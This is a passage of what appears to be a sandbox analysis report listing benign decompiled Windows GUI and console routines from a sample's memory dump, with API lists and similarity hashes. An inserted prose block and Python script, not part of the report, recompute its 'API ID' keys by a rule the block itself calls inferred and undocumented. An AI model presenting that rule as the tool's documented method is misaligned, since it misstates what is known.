                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
• Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp
• Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp
• Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp
• Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp
• Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: Object$Select$BrushCreateDeleteFillFloodPixelReleaseSolid
                                              • String ID:
                                              • API String ID: 2019556567-0
                                              • Opcode ID: 9f0208953a36b982dc7ec73fddde9ff7b38050f52dc80a3b96da8e62fcaeee75
                                              • Instruction ID: 4c913f30251323b740b4c7693da2ffb3dedb81674b65a05090a9138130059aa1
                                              • Opcode Fuzzy Hash: 9f0208953a36b982dc7ec73fddde9ff7b38050f52dc80a3b96da8e62fcaeee75
                                              • Instruction Fuzzy Hash: 01318479A10208EFCB04DF98D988DAEF7B5BF88350F208598E909A7361C771AE51DF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FC1E0(int _a4, struct HWND__* _a8) {
                                              				long* _v8;
                                              				struct HDC__* _v12;
                                              				int _v16;
                                              				int _v20;
                                              				struct HBRUSH__* _v24;
                                              				void* _v28;
                                              				int _t40;
                                              
                                              				_t40 = _a4;
                                              				_v8 =  *_t40;
                                              				while(_v8 != 0) {
                                              					_v12 = GetDC(_a8);
                                              					_v20 = _v8[2];
                                              					_v16 = _v8[3];
                                              					if(_v20 < 0 || _v16 < 0) {
                                              						_v24 = CreateSolidBrush( *_v8);
                                              						_v28 = SelectObject(_v12, _v24);
                                              						ExtFloodFill(_v12,  *(_v8[4] + 8),  *(_v8[4] + 0xc), _v8[1], 1);
                                              						SelectObject(_v12, _v28);
                                              						return DeleteObject(_v24);
                                              					}
                                              					SetPixel(_v12, _v20, _v16,  *_v8);
                                              					_v8 = _v8[4];
                                              					_t40 = ReleaseDC(_a8, _v12);
                                              				}
                                              				return _t40;
                                              			}

                                              APIs
                                              • GetDC.USER32(?), ref: 002FC1FC
                                              • SetPixel.GDI32(?,00000000,00000000,00000000), ref: 002FC235
                                              • CreateSolidBrush.GDI32(?), ref: 002FC243
                                              • SelectObject.GDI32(?,?), ref: 002FC254
                                              • ExtFloodFill.GDI32(?,?,?,?,00000001), ref: 002FC27E
                                              • SelectObject.GDI32(?,?), ref: 002FC28C
                                              • DeleteObject.GDI32(?), ref: 002FC296
                                              • ReleaseDC.USER32 ref: 002FC2AF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
• Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp
• Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp
• Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp
• Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp
• Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: Object$Select$BrushCreateDeleteFillFloodPixelReleaseSolid
                                              • String ID:
                                              • API String ID: 2019556567-0
                                              • Opcode ID: 208679d2345c7900cd0dec7b7493610eb2130dad6ae4fef99e56d4d1067b5ca0
                                              • Instruction ID: 9d87577a3609e387190e3697e5d7fd5c95a8d2ed99a56f85721d654b6051f932
                                              • Opcode Fuzzy Hash: 208679d2345c7900cd0dec7b7493610eb2130dad6ae4fef99e56d4d1067b5ca0
                                              • Instruction Fuzzy Hash: 65318279A10208EFCB08CFD4D9989AEB7B5FB88350F208599E905A7360C770AE41DF60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 73%
                                              			E002F7AAA(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                                              				signed int _v8;
                                              				signed char _v15;
                                              				char _v16;
                                              				void _v24;
                                              				short _v28;
                                              				char _v31;
                                              				void _v32;
                                              				long _v36;
                                              				intOrPtr _v40;
                                              				void* _v44;
                                              				signed int _v48;
                                              				signed char* _v52;
                                              				long _v56;
                                              				int _v60;
                                              				signed int _t78;
                                              				signed int _t80;
                                              				int _t86;
                                              				void* _t94;
                                              				long _t97;
                                              				void _t105;
                                              				void* _t112;
                                              				signed int _t116;
                                              				signed int _t118;
                                              				signed char _t123;
                                              				signed char _t128;
                                              				intOrPtr _t129;
                                              				signed int _t131;
                                              				signed char* _t133;
                                              				intOrPtr* _t135;
                                              				signed int _t136;
                                              				void* _t137;
                                              
                                              				_t78 =  *0x304018; // 0x9021af28
                                              				_v8 = _t78 ^ _t136;
                                              				_t80 = _a8;
                                              				_t118 = _t80 >> 6;
                                              				_t116 = (_t80 & 0x0000003f) * 0x30;
                                              				_t133 = _a12;
                                              				_v52 = _t133;
                                              				_v48 = _t118;
                                              				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x3056f8 + _t118 * 4)) + _t116 + 0x18));
                                              				_v40 = _a16 + _t133;
                                              				_t86 = GetConsoleCP();
                                              				_t135 = _a4;
                                              				_v60 = _t86;
                                              				 *_t135 = 0;
                                              				 *((intOrPtr*)(_t135 + 4)) = 0;
                                              				 *((intOrPtr*)(_t135 + 8)) = 0;
                                              				while(_t133 < _v40) {
                                              					_v28 = 0;
                                              					_v31 =  *_t133;
                                              					_t129 =  *((intOrPtr*)(0x3056f8 + _v48 * 4));
                                              					_t123 =  *(_t129 + _t116 + 0x2d);
                                              					if((_t123 & 0x00000004) == 0) {
                                              						if(( *(E002F58B9(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
                                              							_push(1);
                                              							_push(_t133);
                                              							goto L8;
                                              						} else {
                                              							if(_t133 >= _v40) {
                                              								_t131 = _v48;
                                              								 *((char*)( *((intOrPtr*)(0x3056f8 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
                                              								 *( *((intOrPtr*)(0x3056f8 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x3056f8 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
                                              								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                                              							} else {
                                              								_t112 = E002F6B15( &_v28, _t133, 2);
                                              								_t137 = _t137 + 0xc;
                                              								if(_t112 != 0xffffffff) {
                                              									_t133 =  &(_t133[1]);
                                              									goto L9;
                                              								}
                                              							}
                                              						}
                                              					} else {
                                              						_t128 = _t123 & 0x000000fb;
                                              						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
                                              						_push(2);
                                              						_v15 = _t128;
                                              						 *(_t129 + _t116 + 0x2d) = _t128;
                                              						_push( &_v16);
                                              						L8:
                                              						_push( &_v28);
                                              						_t94 = E002F6B15();
                                              						_t137 = _t137 + 0xc;
                                              						if(_t94 != 0xffffffff) {
                                              							L9:
                                              							_t133 =  &(_t133[1]);
                                              							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                                              							_v56 = _t97;
                                              							if(_t97 != 0) {
                                              								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
                                              									L19:
                                              									 *_t135 = GetLastError();
                                              								} else {
                                              									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
                                              									if(_v36 >= _v56) {
                                              										if(_v31 != 0xa) {
                                              											goto L16;
                                              										} else {
                                              											_t105 = 0xd;
                                              											_v32 = _t105;
                                              											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                                              												goto L19;
                                              											} else {
                                              												if(_v36 >= 1) {
                                              													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
                                              													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                                              													goto L16;
                                              												}
                                              											}
                                              										}
                                              									}
                                              								}
                                              							}
                                              						}
                                              					}
                                              					goto L20;
                                              					L16:
                                              				}
                                              				L20:
                                              				return E002F19D1(_v8 ^ _t136);
                                              			}

                                              APIs
                                              • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,002F821F,?,00000000,?,00000000,00000000), ref: 002F7AEC
                                              • __fassign.LIBCMT ref: 002F7B67
                                              • __fassign.LIBCMT ref: 002F7B82
                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 002F7BA8
                                              • WriteFile.KERNEL32(?,?,00000000,002F821F,00000000,?,?,?,?,?,?,?,?,?,002F821F,?), ref: 002F7BC7
                                              • WriteFile.KERNEL32(?,?,00000001,002F821F,00000000,?,?,?,?,?,?,?,?,?,002F821F,?), ref: 002F7C00
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                              • String ID:
                                              • API String ID: 1324828854-0
                                              • Opcode ID: 1467036a1137ba96bb8c4cbe082a4c5f6256bffaae9bb3e427a1e7ac5a1186b2
                                              • Instruction ID: 9889fc726157420b97cad4c1014da81693ccc0eaec0cab8c9ba46af1544bd160
                                              • Opcode Fuzzy Hash: 1467036a1137ba96bb8c4cbe082a4c5f6256bffaae9bb3e427a1e7ac5a1186b2
                                              • Instruction Fuzzy Hash: 1A51F3B091420D9FDB10CFA8D885AFEFBF8EF09340F14407AE651E7291E6709951CB60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FCD70(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                              				int _v8;
                                              				struct HDC__* _v12;
                                              				struct tagRECT _v28;
                                              				struct tagPAINTSTRUCT _v92;
                                              				long _t36;
                                              
                                              				_v8 = _a8;
                                              				if(_v8 == 0xf) {
                                              					GetClientRect(_a4,  &_v28);
                                              					_v12 = BeginPaint(_a4,  &_v92);
                                              					_t36 =  *0x304a00; // 0xffffff
                                              					SetBkColor(_v12, _t36);
                                              					ExtTextOutW(_v12, 0, 0, 2,  &_v28, 0x305938, 0, 0);
                                              					EndPaint(_a4,  &_v92);
                                              				} else {
                                              					if(_v8 == 0x201) {
                                              						 *0x304a00 = E002FCA50(_a4);
                                              						InvalidateRect(_a4, 0, 1);
                                              					}
                                              				}
                                              				return DefWindowProcW(_a4, _a8, _a12, _a16);
                                              			}

                                              APIs
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 002FCDA3
                                              • GetClientRect.USER32 ref: 002FCDB3
                                              • BeginPaint.USER32(?,?), ref: 002FCDC1
                                              • SetBkColor.GDI32(?,00FFFFFF), ref: 002FCDD5
                                              • ExtTextOutW.GDI32(?,00000000,00000000,00000002,?,00305938,00000000,00000000), ref: 002FCDF2
                                              • EndPaint.USER32(?,?), ref: 002FCE00
                                              • DefWindowProcW.USER32(?,?,?,?), ref: 002FCE16
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: PaintRect$BeginClientColorInvalidateProcTextWindow
                                              • String ID:
                                              • API String ID: 418155164-0
                                              • Opcode ID: a6774af14a743247c02e119c0ffce8c76c9234e08a3b2cff9041a5a3e0e6f69f
                                              • Instruction ID: d817a1c520401e4848020557dd21a7e30cfadc2a703c4f349b5aed0617e41e0b
                                              • Opcode Fuzzy Hash: a6774af14a743247c02e119c0ffce8c76c9234e08a3b2cff9041a5a3e0e6f69f
                                              • Instruction Fuzzy Hash: 4021517565020CFBDB14CFA4EC49FEE7B79AB48750F108518FA099B290D7709A50CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FC4C0(struct HINSTANCE__* _a8) {
                                              				struct _WNDCLASSEXW _v52;
                                              				void* _t19;
                                              
                                              				_v52.cbSize = 0;
                                              				E002F1D00(_t19,  &(_v52.style), 0, 0x2c);
                                              				_v52.cbSize = 0x30;
                                              				_v52.lpfnWndProc = E002FD400;
                                              				_v52.hInstance = _a8;
                                              				_v52.hbrBackground = GetSysColorBrush(0xf);
                                              				_v52.lpszClassName = L"SAVEBOXCLASS";
                                              				RegisterClassExW( &_v52);
                                              				return CreateWindowExW(9, L"SAVEBOXCLASS", 0x3049d8, 0x10c80000, 0x64, 0x64, 0xc8, 0xc8, 0, 0, _a8, 0);
                                              			}

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 002FC4F3
                                              • RegisterClassExW.USER32 ref: 002FC507
                                              • CreateWindowExW.USER32 ref: 002FC536
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: BrushClassColorCreateRegisterWindow
                                              • String ID: 0$SAVEBOXCLASS$SAVEBOXCLASS
                                              • API String ID: 4191210197-2091478518
                                              • Opcode ID: 108b436e078b864566325f8a4348c78ad8a32f0d04c11a570a94d9aeb92a2868
                                              • Instruction ID: d72286a97e308a44f03ceadae57f97fbe2c9e182a024b2b7abe425f39409cddb
                                              • Opcode Fuzzy Hash: 108b436e078b864566325f8a4348c78ad8a32f0d04c11a570a94d9aeb92a2868
                                              • Instruction Fuzzy Hash: 900181B4A80308BBFB109F90EC4AFAEBB74AB04B14F004125FB147A2C0D7F01614CB95
                                              Uniqueness

                                              Uniqueness Score: -1.00%
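The three entries above (E002F7AAA, E002FCD70 and E002FC4C0) share one layout: a "C-Code - Quality" percentage, the function signature, an "APIs" list of `Name.MODULE(args), ref: address` lines and a "Similarity" block whose "API ID" is the key used to match functions across samples. The Python script below is an added example, not part of the Joe Sandbox report or its tooling: it parses those lines and recomputes the "API ID" from the API names. The derivation rule it applies (split each API name on CamelCase, drop tokens shorter than four characters, group tokens by how often they occur, sort each group, join the groups with "$") is inferred from the three entries and is an assumption, not a documented Joe Sandbox algorithm; the `triage` labels (LIBCMT references mean statically linked CRT, USER32/GDI32 mean GUI code) are likewise the example's own heuristic for deciding which functions deserve a closer look.

```python
import re
from collections import Counter

# Lines copied from the three report entries above (E002F7AAA, E002FCD70,
# E002FC4C0); only the fields the parser needs are kept.
REPORT = """\
C-Code - Quality: 73%
E002F7AAA(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
APIs
• GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,002F821F,?,00000000,?,00000000,00000000), ref: 002F7AEC
• __fassign.LIBCMT ref: 002F7B67
• __fassign.LIBCMT ref: 002F7B82
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 002F7BA8
• WriteFile.KERNEL32(?,?,00000000,002F821F,00000000,?,?,?,?,?,?,?,?,?,002F821F,?), ref: 002F7BC7
• WriteFile.KERNEL32(?,?,00000001,002F821F,00000000,?,?,?,?,?,?,?,?,?,002F821F,?), ref: 002F7C00
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
C-Code - Quality: 100%
E002FCD70(struct HWND__* _a4, int _a8, int _a12, long _a16) {
APIs
• InvalidateRect.USER32(?,00000000,00000001), ref: 002FCDA3
• GetClientRect.USER32 ref: 002FCDB3
• BeginPaint.USER32(?,?), ref: 002FCDC1
• SetBkColor.GDI32(?,00FFFFFF), ref: 002FCDD5
• ExtTextOutW.GDI32(?,00000000,00000000,00000002,?,00305938,00000000,00000000), ref: 002FCDF2
• EndPaint.USER32(?,?), ref: 002FCE00
• DefWindowProcW.USER32(?,?,?,?), ref: 002FCE16
Similarity
• API ID: PaintRect$BeginClientColorInvalidateProcTextWindow
C-Code - Quality: 100%
E002FC4C0(struct HINSTANCE__* _a8) {
APIs
• GetSysColorBrush.USER32(0000000F), ref: 002FC4F3
• RegisterClassExW.USER32 ref: 002FC507
• CreateWindowExW.USER32 ref: 002FC536
Similarity
• API ID: BrushClassColorCreateRegisterWindow
"""

FUNC_RE = re.compile(r"^(E[0-9A-F]{8})\(")
QUALITY_RE = re.compile(r"^C-Code - Quality: (\d+)%")
# "Name.MODULE(args), ref: addr" or "Name.MODULE ref: addr"
API_RE = re.compile(
    r"^•\s*([A-Za-z_]\w*)\.([A-Z0-9]+)(?:\(([^)]*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)")
APIID_RE = re.compile(r"^•\s*API ID:\s*(\S+)")
# CamelCase splitter: "__fassign" | "Console" | all-caps runs like "CP", "DC", "W"
TOKEN_RE = re.compile(r"__[a-z0-9]+|[A-Z][a-z0-9]+|[A-Z]+(?![a-z])|[a-z0-9]+")
MIN_TOKEN_LEN = 4  # assumption: "Proc" (4) is kept, "Get"/"Sys"/"Ext" (3) are dropped


def parse_functions(text):
    """Return one dict per decompiled function: name, quality, apis, api_id."""
    funcs, cur, quality = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if m := QUALITY_RE.match(line):
            quality = int(m.group(1))
        elif m := FUNC_RE.match(line):
            cur = {"name": m.group(1), "quality": quality, "apis": [], "api_id": None}
            funcs.append(cur)
        elif cur is not None and (m := API_RE.match(line)):
            cur["apis"].append({"api": m.group(1), "module": m.group(2),
                                "args": m.group(3), "ref": m.group(4)})
        elif cur is not None and (m := APIID_RE.match(line)):
            cur["api_id"] = m.group(1)
    return funcs


def api_id(api_names):
    """Recompute the report's 'API ID' key (rule inferred from the report, see lead-in)."""
    counts = Counter(tok for name in api_names
                     for tok in TOKEN_RE.findall(name) if len(tok) >= MIN_TOKEN_LEN)
    groups = []
    for n in sorted(set(counts.values()), reverse=True):   # most frequent tokens first
        groups.append("".join(sorted(t for t, c in counts.items() if c == n)))
    return "$".join(groups)


def triage(func):
    """Heuristic label: statically linked CRT, GUI code, or anything else."""
    modules = {a["module"] for a in func["apis"]}
    if "LIBCMT" in modules:
        return "crt"
    if modules & {"USER32", "GDI32"}:
        return "gui"
    return "other"


def check_api_ids(funcs):
    """(name, recomputed key, key printed in the report) for every function."""
    return [(f["name"], api_id([a["api"] for a in f["apis"]]), f["api_id"]) for f in funcs]


if __name__ == "__main__":
    for name, computed, reported in check_api_ids(parse_functions(REPORT)):
        print(f"{name} {computed} [{'ok' if computed == reported else 'MISMATCH'}]")
```

Run against the three entries the recomputed keys equal the reported ones, which is what makes the inferred rule worth keeping: with it, functions from other reports can be bucketed by "API ID" before anyone reads the decompilation, and CRT helpers such as E002F7AAA (flagged by the `__fassign.LIBCMT` references) can be set aside in favour of the code that actually belongs to the sample.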

                                              C-Code - Quality: 100%
                                              			E002FC550(struct HINSTANCE__* _a8) {
                                              				struct _WNDCLASSEXW _v52;
                                              				void* _t19;
                                              
                                              				_v52.cbSize = 0;
                                              				E002F1D00(_t19,  &(_v52.style), 0, 0x2c);
                                              				_v52.cbSize = 0x30;
                                              				_v52.lpfnWndProc = E002FD620;
                                              				_v52.hInstance = _a8;
                                              				_v52.hbrBackground = GetSysColorBrush(0xf);
                                              				_v52.lpszClassName = L"CGBOXCLASS";
                                              				RegisterClassExW( &_v52);
                                              				return CreateWindowExW(9, L"CGBOXCLASS", 0x30498c, 0x10c80000, 0x64, 0x64, 0xc8, 0xc8, 0, 0, _a8, 0);
                                              			}

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 002FC583
                                              • RegisterClassExW.USER32 ref: 002FC597
                                              • CreateWindowExW.USER32 ref: 002FC5C6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: BrushClassColorCreateRegisterWindow
                                              • String ID: 0$CGBOXCLASS$CGBOXCLASS
                                              • API String ID: 4191210197-2424895175
                                              • Opcode ID: 1fdabf13456a7965bb9e5a2dbe71ea291939cc03a16fd2385a04af9bf94c8e6a
                                              • Instruction ID: f296cf72a13b8ee4a4f384898086c91cba9a8add45422f9261ccb58c9d8a0b08
                                              • Opcode Fuzzy Hash: 1fdabf13456a7965bb9e5a2dbe71ea291939cc03a16fd2385a04af9bf94c8e6a
                                              • Instruction Fuzzy Hash: 270181B4A90308BBFB109F90EC4AFAEBB78AB04B04F004124FB147A2C1D7F01614CB95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FC5E0(struct HINSTANCE__* _a12) {
                                              				struct _WNDCLASSEXW _v52;
                                              				void* _t19;
                                              
                                              				_v52.cbSize = 0;
                                              				E002F1D00(_t19,  &(_v52.style), 0, 0x2c);
                                              				_v52.cbSize = 0x30;
                                              				_v52.lpfnWndProc = E002FD5A0;
                                              				_v52.hInstance = _a12;
                                              				_v52.hbrBackground = GetSysColorBrush(0xf);
                                              				_v52.lpszClassName = L"DialogClass";
                                              				RegisterClassExW( &_v52);
                                              				return CreateWindowExW(9, L"DialogClass", 0x30494c, 0x10c80000, 0x64, 0x64, 0xc8, 0x96, 0, 0, _a12, 0);
                                              			}

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 002FC613
                                              • RegisterClassExW.USER32 ref: 002FC627
                                              • CreateWindowExW.USER32 ref: 002FC656
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: BrushClassColorCreateRegisterWindow
                                              • String ID: 0$DialogClass$DialogClass
                                              • API String ID: 4191210197-3050871603
                                              • Opcode ID: 5a559c4c7d1434afbb70a9803734c39ec08d4add737a28d751fc292d776b6a1a
                                              • Instruction ID: d31833288f25d2d369a6ac2c36c5039dcea7e008dad5135fe880e130d6cc2686
                                              • Opcode Fuzzy Hash: 5a559c4c7d1434afbb70a9803734c39ec08d4add737a28d751fc292d776b6a1a
                                              • Instruction Fuzzy Hash: A50181B0A90308BBEB109F90EC5AFAFBB74AB04B44F500424FB147A2C1D7F15524CB95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FB540(void* __eflags, struct HDC__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
                                              				intOrPtr _v8;
                                              				long _v12;
                                              				int _v16;
                                              				int _v20;
                                              				int _v24;
                                              				int _v28;
                                              				int _v32;
                                              				int _v36;
                                              				int _v40;
                                              				int _t219;
                                              				int _t225;
                                              				int _t231;
                                              				int _t237;
                                              				int _t243;
                                              
                                              				_v16 = E002FB8A0(_a12, _a4, _a8, _a12, _a20);
                                              				_v8 = E002FB840(_a4, _a4, _a8, _a12, _a20);
                                              				E002FBE50(_a4, _a4, _v16, _a12, _v8, _a12, _a16, _a36, 1, 0);
                                              				if(_a32 != 1) {
                                              					_v28 = _v16;
                                              					while(1) {
                                              						__eflags = _v28 - _v8;
                                              						if(_v28 > _v8) {
                                              							goto L20;
                                              						}
                                              						_v12 = GetPixel(_a4, _v28, _a12 - 1);
                                              						__eflags = _v12 - _a20;
                                              						if(_v12 == _a20) {
                                              							__eflags = _a12 - 1;
                                              							_v28 = E002FB540(_a12 - 1, _a4, _v28, _a12 - 1, _a16, _a20, _v16, _v8, 2, _a36);
                                              						}
                                              						_t237 = _v28 + 1;
                                              						__eflags = _t237;
                                              						_v28 = _t237;
                                              					}
                                              				} else {
                                              					_v20 = _v16;
                                              					while(_v20 < _a24) {
                                              						_v12 = GetPixel(_a4, _v20, _a12 - 1);
                                              						if(_v12 == _a20) {
                                              							_v20 = E002FB540(_a12 - 1, _a4, _v20, _a12 - 1, _a16, _a20, _v16, _v8, 2, _a36);
                                              						}
                                              						_v20 = _v20 + 1;
                                              					}
                                              					_v24 = _a28 + 1;
                                              					while(1) {
                                              						__eflags = _v24 - _v8;
                                              						if(_v24 > _v8) {
                                              							break;
                                              						}
                                              						_v12 = GetPixel(_a4, _v24, _a12 - 1);
                                              						__eflags = _v12 - _a20;
                                              						if(_v12 == _a20) {
                                              							__eflags = _a12 - 1;
                                              							_v24 = E002FB540(_a12 - 1, _a4, _v24, _a12 - 1, _a16, _a20, _v16, _v8, 2, _a36);
                                              						}
                                              						_t243 = _v24 + 1;
                                              						__eflags = _t243;
                                              						_v24 = _t243;
                                              					}
                                              				}
                                              				L20:
                                              				__eflags = _a32 - 2;
                                              				if(_a32 != 2) {
                                              					_v40 = _v16;
                                              					while(1) {
                                              						__eflags = _v40 - _v8;
                                              						if(_v40 > _v8) {
                                              							goto L40;
                                              						}
                                              						_v12 = GetPixel(_a4, _v40, _a12 + 1);
                                              						__eflags = _v12 - _a20;
                                              						if(_v12 == _a20) {
                                              							__eflags = _a12 + 1;
                                              							_v40 = E002FB540(_a12 + 1, _a4, _v40, _a12 + 1, _a16, _a20, _v16, _v8, 1, _a36);
                                              						}
                                              						_t219 = _v40 + 1;
                                              						__eflags = _t219;
                                              						_v40 = _t219;
                                              					}
                                              				} else {
                                              					_v32 = _v16;
                                              					while(1) {
                                              						__eflags = _v32 - _a24;
                                              						if(_v32 >= _a24) {
                                              							break;
                                              						}
                                              						_v12 = GetPixel(_a4, _v32, _a12 + 1);
                                              						__eflags = _v12 - _a20;
                                              						if(_v12 == _a20) {
                                              							__eflags = _a12 + 1;
                                              							_v32 = E002FB540(_a12 + 1, _a4, _v32, _a12 + 1, _a16, _a20, _v16, _v8, 1, _a36);
                                              						}
                                              						_t231 = _v32 + 1;
                                              						__eflags = _t231;
                                              						_v32 = _t231;
                                              					}
                                              					_v36 = _a28 + 1;
                                              					while(1) {
                                              						__eflags = _v36 - _v8;
                                              						if(_v36 > _v8) {
                                              							break;
                                              						}
                                              						_v12 = GetPixel(_a4, _v36, _a12 + 1);
                                              						__eflags = _v12 - _a20;
                                              						if(_v12 == _a20) {
                                              							__eflags = _a12 + 1;
                                              							_v36 = E002FB540(_a12 + 1, _a4, _v36, _a12 + 1, _a16, _a20, _v16, _v8, 1, _a36);
                                              						}
                                              						_t225 = _v36 + 1;
                                              						__eflags = _t225;
                                              						_v36 = _t225;
                                              					}
                                              				}
                                              				L40:
                                              				return _v8;
                                              			}


                                              APIs
                                                • Part of subcall function 002FB8A0: GetPixel.GDI32(?,?,?), ref: 002FB8B0
                                                • Part of subcall function 002FB8A0: GetPixel.GDI32(?,00000000,?), ref: 002FB8DC
                                                • Part of subcall function 002FB840: GetPixel.GDI32(?,?,?), ref: 002FB850
                                                • Part of subcall function 002FB840: GetPixel.GDI32(?,00000000,?), ref: 002FB87C
                                                • Part of subcall function 002FBE50: GetPixel.GDI32(?,?,?), ref: 002FBF17
                                                • Part of subcall function 002FBE50: SetPixel.GDI32(?,?,?,?), ref: 002FBF70
                                              • GetPixel.GDI32(?,?,?), ref: 002FB5CD
                                              • GetPixel.GDI32(?,?,?), ref: 002FB638
